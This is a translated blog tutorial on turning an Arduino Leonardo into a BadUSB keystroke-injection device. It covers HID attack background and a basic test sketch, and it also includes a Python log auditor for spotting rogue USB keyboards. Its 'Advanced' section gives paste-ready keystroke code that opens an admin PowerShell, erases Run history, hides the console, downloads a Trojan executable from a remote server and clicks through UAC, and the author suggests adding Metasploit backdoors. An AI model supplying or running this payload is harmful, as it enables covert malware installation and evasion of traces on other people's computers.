Quickly make teensy BadUSB with Arduino

Source: Internet
Author: User
Tags: comparison table

0x00 Introduction

This article describes the process of building an Arduino version of BadUSB in a simpler way. I know that many people before me have written related articles, but beginners may still be a little confused, so this article is a quick introduction for getting the idea. I am also just a newbie, so experts please don't flame me, thank you ~.

"BadUSB" is one of the hottest topics in computer security. It was discovered jointly by Karsten Nohl and Jakob Lell and presented at the Black Hat security conference in 2014. Although a year or two have passed since then, people are still studying it, and the ways it attacks are varied.

The first part, the introduction to BadUSB, is reproduced from: https://security.tencent.com/index.php/blog/msg/74

BadUSB principle

Before introducing the principle of BadUSB, the author introduces the two types of attack that existed before BadUSB appeared and that use HID (Human Interface Device: devices that interact directly with the computer, such as keyboards and mice). They are "USB Rubber Ducky" and "Teensy" respectively.

Teensy Introduction

When an attacker makes a custom attack device, an attack chip is placed inside the USB device. This chip is a very small but fully functional microcontroller development system called Teensy. With Teensy you can simulate a keyboard and mouse: when you plug in this custom USB device, the computer recognises it as a keyboard, and by using the device's microprocessor and storage space and programming it with the attack code, you can send control commands to the host and take full control of it, regardless of whether AutoPlay is turned on.

About Teensy, you can refer to "HID attack: Teensy in practice" by Tianrongxin (Topsec) Alpha Lab.

USB Rubber Ducky Introduction

USB Rubber Ducky, commonly called the USB rubber duck, was the first keystroke injection tool. It was implemented on an embedded development board and later grew into a fully fledged commercial keystroke injection attack platform. It also works by making the USB device simulate a keyboard so that the computer recognises it as one, and then scripting the keystrokes.

These two types of attack were the more popular HID attack methods before BadUSB was released. Their flaw is that they need customised hardware, so they are not very general. BadUSB is different: it builds on the "USB Rubber Ducky" and "Teensy" attack methods but uses general-purpose USB devices (such as a USB stick).

Internal structure of a USB stick

A USB flash drive consists of two parts: the chip controller and the flash memory. The chip controller is responsible for communicating with and being identified by the PC; the flash memory is used for data storage. Part of the flash memory is used to store the firmware of the USB stick, which acts like an operating system, controlling the interaction between hardware and software; the firmware cannot be read by ordinary means.

BadUSB reverse-engineers and reprograms the firmware of the USB stick, which is equivalent to rewriting the USB stick's operating system in order to attack.

USB Protocol Vulnerability

Why rewrite the firmware? Let us look at the security hole in the USB protocol.

There are many kinds of USB devices, such as audio and video devices, cameras and so on, so the system is required to provide maximum compatibility, even driver-free operation. So when the USB standard was designed, a USB device was not required to carry a unique identifier, like the MAC address of a network device, that the system could use for validation. Instead, a USB device is allowed to present several input characteristics at once. This is what BadUSB exploits: the USB stick's firmware is rewritten so the stick is disguised as a USB keyboard, and the attack is carried out by typing, through that virtual keyboard, the instructions and code integrated into the firmware.
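Since the host has nothing like a MAC address to validate, the defender is left with what the device declares about itself, and the sections above show two tell-tale shapes: a development board (the Arduino Leonardo used later on this page) enumerating as a keyboard, and a single storage device that also presents a keyboard interface. The following Python is an added example, not code from the original article: it audits constructed Linux kernel log lines for both patterns. The Leonardo's idVendor/idProduct pair (2341:8036) is the one published in Arduino's board definitions and is assumed here; the other ids, product strings and the allowlist are made up.

```python
import re

# Constructed sample kernel log lines (not captured from a real host): an
# allowlisted keyboard, then an Arduino Leonardo presenting itself as a
# keyboard, then a thumb drive exposing both storage and keyboard interfaces.
SAMPLE_DMESG = """\
usb 1-1: New USB device found, idVendor=1111, idProduct=2222, bcdDevice= 1.00
usb 1-1: Product: Corporate Keyboard
hid-generic 0003:1111:2222.0004: input,hidraw0: USB HID v1.11 Keyboard [Corporate Keyboard] on usb-0000:00:14.0-1/input0
usb 1-2: New USB device found, idVendor=2341, idProduct=8036, bcdDevice= 1.00
usb 1-2: Product: Arduino Leonardo
hid-generic 0003:2341:8036.0005: input,hidraw1: USB HID v1.01 Keyboard [Arduino LLC Arduino Leonardo] on usb-0000:00:14.0-2/input2
usb 1-3: New USB device found, idVendor=aaaa, idProduct=bbbb, bcdDevice= 1.00
usb 1-3: Product: Example Thumb Drive
usb-storage 1-3:1.0: USB Mass Storage device detected
hid-generic 0003:AAAA:BBBB.0006: input,hidraw2: USB HID v1.11 Keyboard [Example Thumb Drive] on usb-0000:00:14.0-3/input1
"""

# Keyboards the organisation actually issued (constructed allowlist of vid, pid).
KNOWN_KEYBOARDS = {("1111", "2222")}

NEW_DEV = re.compile(r"usb (\S+): New USB device found, idVendor=([0-9a-f]{4}), idProduct=([0-9a-f]{4})")
PRODUCT = re.compile(r"usb (\S+): Product: (.+)")
STORAGE = re.compile(r"usb-storage (\S+):\d+\.\d+: USB Mass Storage device detected")
KEYBOARD = re.compile(r"hid-generic 0003:([0-9A-F]{4}):([0-9A-F]{4})\.\d+: .* Keyboard \[")


def audit_usb_log(text):
    """Return alert strings for devices that register a keyboard interface
    while being unlisted or while also acting as mass storage."""
    by_port, devices = {}, {}  # port -> (vid, pid); (vid, pid) -> attributes
    for line in text.splitlines():
        if m := NEW_DEV.search(line):
            port, vid, pid = m.groups()
            by_port[port] = (vid, pid)
            devices[(vid, pid)] = {"product": "?", "storage": False, "keyboard": False}
        elif (m := PRODUCT.search(line)) and m.group(1) in by_port:
            devices[by_port[m.group(1)]]["product"] = m.group(2).strip()
        elif (m := STORAGE.search(line)) and m.group(1) in by_port:
            devices[by_port[m.group(1)]]["storage"] = True
        elif m := KEYBOARD.search(line):
            key = (m.group(1).lower(), m.group(2).lower())  # hid-generic prints upper-case hex
            if key in devices:
                devices[key]["keyboard"] = True
    alerts = []
    for (vid, pid), info in devices.items():
        if not info["keyboard"]:
            continue
        ident = f"{vid}:{pid} ({info['product']})"
        if info["storage"]:
            alerts.append(f"storage device also presents a keyboard interface: {ident}")
        elif (vid, pid) not in KNOWN_KEYBOARDS:
            alerts.append(f"unlisted device enumerated as a keyboard: {ident}")
    return alerts
```

Because the page's whole point is that firmware can be rewritten, vendor/product ids and product strings are claims, not proof: the check catches the default Leonardo and the storage-plus-keyboard shape, but a reflashed device can copy an allowlisted keyboard's ids, so this is a triage signal, not a gate.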

BadUSB code analysis

A simple walk-through of the code published by Karsten Nohl and Jakob Lell.

This is how a USB flash drive carrying malicious code is produced; for more detail you can search for the code published by Karsten Nohl and Jakob Lell.

0x01 Production process

OK, without further ado, let's get started ~ We are using an Arduino to make a Teensy. Arduino is a small programmable computer, called a microcontroller, designed to be as simple as possible to use, and the microcontroller can give objects interactive functions.

Let's take a look at the materials we need to prepare.

Arduino Leonardo // small microcontroller that emulates a USB device

Arduino IDE // compiler for burning the code: http://www.arduino.cn/thread-5838-1-1.html

Android data cable // for connecting to the computer's USB port

One PC // OK, we can get started.

Extension: students who pursue perfection can consider an ultra-short micro-USB to USB adapter.

We can shop for the Arduino Leonardo MCU on the major e-commerce platforms; I believe you can definitely find one.

I had already bought the micro-USB adapter, and when I picked the two of them up ready to snap them together ~ ~ ~

On the spot: tell me why it won't plug in ~ ~ ~ I'll keep it as a souvenir. So I went first as cannon fodder; I hope other friends don't end up like me ~ ~

Those interested can think about the thing called an OTG adapter. I sacrificed myself once more, and the discovery is true .... it works!

OK ~ First, everyone installs the Arduino IDE. The installation process is very simple, just click Next; there is no difficulty.

Open the IDE once the installation is finished.

Open our IDE

After the IDE was revised, the startup interface changed; it is not the previous version. This is what it looks like when you open it:

Well, then we'll start coding, but before we do, we need to plug in the Arduino Leonardo first. Then we save the project file; we recommend that you save it directly on the desktop.

Then you'll have a demo folder on your desktop.

Inside the folder is our demo file. Well, let's start writing code:

void setup() {
  // put your setup code here, to run once:
}

This code is the initialisation of our program.

void loop() {
  // put your main code here, to run repeatedly:
}

This piece of code is where we put what we want to loop.

The above is just the framework the program gives us; the actual code we have to write ourselves. We let the USB device operate the computer mainly by automating keyboard operations, so we will use the Arduino keyboard functions:

#include <Keyboard.h>     // header file of the keyboard module
Keyboard.begin();         // start keyboard communication
Keyboard.press(key);      // press a key
Keyboard.release(key);    // release a key
Keyboard.println(text);   /* type some content; some explanations online say it
                             also sends Enter, but in my test it did not (possibly
                             version-related). Don't worry, there is another way
                             to send Enter. */
Keyboard.end();           // end keyboard communication

OK, these are the main functions we use.

Well, now I'll write some simple code so that you can get a sense of what the code means:

#include <Keyboard.h>              // include the keyboard module header file

void setup() {                     // initialisation
  Keyboard.begin();                // start keyboard communication
  delay(1000);                     // wait 1000 ms; not too short, since every computer runs at a different speed
  Keyboard.press(KEY_CAPS_LOCK);   // press Caps Lock; it is best to do this, otherwise most computers with a Chinese input method will have problems
  Keyboard.release(KEY_CAPS_LOCK); // release Caps Lock
  delay(500);
  Keyboard.press(KEY_LEFT_GUI);    // press the logo key, i.e. the Win key
  delay(500);
  Keyboard.press('r');             // press the R key
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);  // release the Win key
  Keyboard.release('r');           // release the R key
  delay(500);
  Keyboard.println("cmd");         // type cmd to open a DOS window
  delay(500);
  Keyboard.press(KEY_RETURN);      // press Enter
  Keyboard.release(KEY_RETURN);    // release Enter
  delay(500);
  Keyboard.println("echo first test");
  Keyboard.press(KEY_RETURN);      // press Enter
  Keyboard.release(KEY_RETURN);    // release Enter
  delay(500);
  Keyboard.press(KEY_CAPS_LOCK);   // press Caps Lock again to turn it back off
  Keyboard.release(KEY_CAPS_LOCK); // release Caps Lock
  delay(500);
  Keyboard.end();                  // end keyboard communication
}

void loop() {                      // loop body: write the code you want to repeat here
}

Well, now we write the code into the IDE.

Then we have to choose the right development board and COM port; these differ from computer to computer.

Everything is ready. We click Compile to see whether the program compiles properly.

The message tells us that we compiled successfully.

Then comes the last step to success: upload.

Once the upload succeeds, the computer will automatically disconnect the USB device and then reconnect it, and then the Arduino Leonardo will run automatically.

Let's take a look: it starts by pressing Caps Lock, then opens the Run window, then types cmd and presses Enter.

The program then types echo first test and presses Enter ~~!! It's done!

The above uses the Arduino Leonardo to automate the echo operation, simulating a BadUSB.

0x02 Advanced

So I share my code. The main function it implements is to download our Trojan from a remote server and then execute it, without leaving records. Others on the net achieve the same purpose, but their code may differ. Well, let's look at the code; because of its length, I directly post only the main code block that implements it.

Students who need it can paste it into their own sketch.

Keyboard.println("powershell.exe -command start-process powershell -verb runAs");   /* open an administrator-level PowerShell */
Keyboard.println("reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f"); /* clear the record left by the Run window */
Keyboard.println("cmd.exe /t:01 /k mode con:cols=16 lines=1");                    // shrink the cmd window to a very small one
Keyboard.println("$P = New-Object System.Net.WebClient");                          // define an object with PowerShell
Keyboard.println("$P.DownloadFile('http://192.168.0.109/super.exe', 'c:\\super.exe')"); /* download from the server: the server address and the Trojan's name, and the target path where the Trojan is stored, are set by yourself */
// I thought of a rather clumsy way to get past UAC myself: just answer the administrator prompt box
Keyboard.press(KEY_LEFT_ARROW);    // press the Left Arrow key
Keyboard.release(KEY_LEFT_ARROW);  // release the Left Arrow key
Keyboard.press(KEY_RETURN);        // press Enter
Keyboard.release(KEY_RETURN);      // release Enter

Notes ~

1. Why we have to open an admin PowerShell: in the first place CMD does not support downloading a file from the server, and even if we call PowerShell from CMD, a download as a non-administrator gives an error. So we have to open the administrator's PowerShell. In fact there are many ways to write the download code; mine is just one. If you have a better way to download, tell me, thanks. Command gurus can play with it themselves.

2. Also note that when programming in the IDE, the specified directory must use \\ double backslashes.

3. The letters of these commands are case-sensitive. Because we turn on Caps Lock at the beginning of the program, to get the real letters we want we must invert the case in the IDE: lowercase to uppercase and uppercase to lowercase, so that the program's output is the result we want.

4. There is also delay(); tune this yourself, the value is not unique. My computer here may be relatively slow.

Finally, the key value comparison table is attached

Key                Hexadecimal value   Decimal value
KEY_LEFT_CTRL      0x80                128
KEY_LEFT_SHIFT     0x81                129
KEY_LEFT_ALT       0x82                130
KEY_LEFT_GUI       0x83                131
KEY_RIGHT_CTRL     0x84                132
KEY_RIGHT_SHIFT    0x85                133
KEY_RIGHT_ALT      0x86                134
KEY_RIGHT_GUI      0x87                135
KEY_UP_ARROW       0xDA                218
KEY_DOWN_ARROW     0xD9                217
KEY_LEFT_ARROW     0xD8                216
KEY_RIGHT_ARROW    0xD7                215
KEY_BACKSPACE      0xB2                178
KEY_TAB            0xB3                179
KEY_RETURN         0xB0                176
KEY_ESC            0xB1                177
KEY_INSERT         0xD1                209
KEY_DELETE         0xD4                212
KEY_PAGE_UP        0xD3                211
KEY_PAGE_DOWN      0xD6                214
KEY_HOME           0xD2                210
KEY_END            0xD5                213
KEY_CAPS_LOCK      0xC1                193
KEY_F1             0xC2                194
KEY_F2             0xC3                195
KEY_F3             0xC4                196
KEY_F4             0xC5                197
KEY_F5             0xC6                198
KEY_F6             0xC7                199
KEY_F7             0xC8                200
KEY_F8             0xC9                201
KEY_F9             0xCA                202
KEY_F10            0xCB                203
KEY_F11            0xCC                204
KEY_F12            0xCD                205

Of course, my code is relatively simple, with no control statements or other functions; interested students can look at some handy programming knowledge to make the BadUSB smarter, so that it can make decisions.

We can also combine it with Metasploit for backdoors, Trojan implants, or some batch files to make our own computers a mess, haha ...

This article may be offensive in nature and should not be used for illegal purposes. Personal research is completely fine; any responsibility has nothing to do with me. If there are shortcomings, please point them out; thank you.

Reference documents:

http://www.myhack58.com/Article/60/76/2014/56812.htm

http://zone.wooyun.org/content/17931

http://www.freebuf.com/articles/terminal/6182.html

https://security.tencent.com/index.php/blog/msg/74
